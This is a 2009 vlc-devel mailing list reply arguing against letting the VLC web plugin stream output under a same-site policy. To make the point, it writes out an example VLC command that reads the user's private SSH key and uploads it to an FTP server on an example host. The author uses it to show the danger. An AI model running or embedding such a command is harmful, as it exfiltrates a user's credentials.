[vlc-devel] [rfc] Let the web plugin have output chains

Rémi Denis-Courmont rem at videolan.org
Sun Dec 20 22:14:00 CET 2009

Le dimanche 20 décembre 2009, Luca Barbato a écrit :
> Still would be nice to have this limit relaxed having more or less
> the same policy you get in javascript (same-site): you may be allowed
> to stream to the same server you got the webpage instantiating the
> plugin.

Erk.

vlc \
    file/rawaud:///home/user/.ssh/id_dsa \
    --sout-std-access ftp
    --sout '#std{mux=raw,dst=ftp://ftp.example.com/incoming/id_dsa}'

...or something like that, and with Javascript. Needless to say, that
sounds like a bad idea. Same site would really mean that the input
comes from the same site as the output. I'm afraid that is not what you
want to have.

Several people would like to enable some kind of stream output through
JS. But I really have no clue how this could be done safely at this
point.

http://www.remlab.net/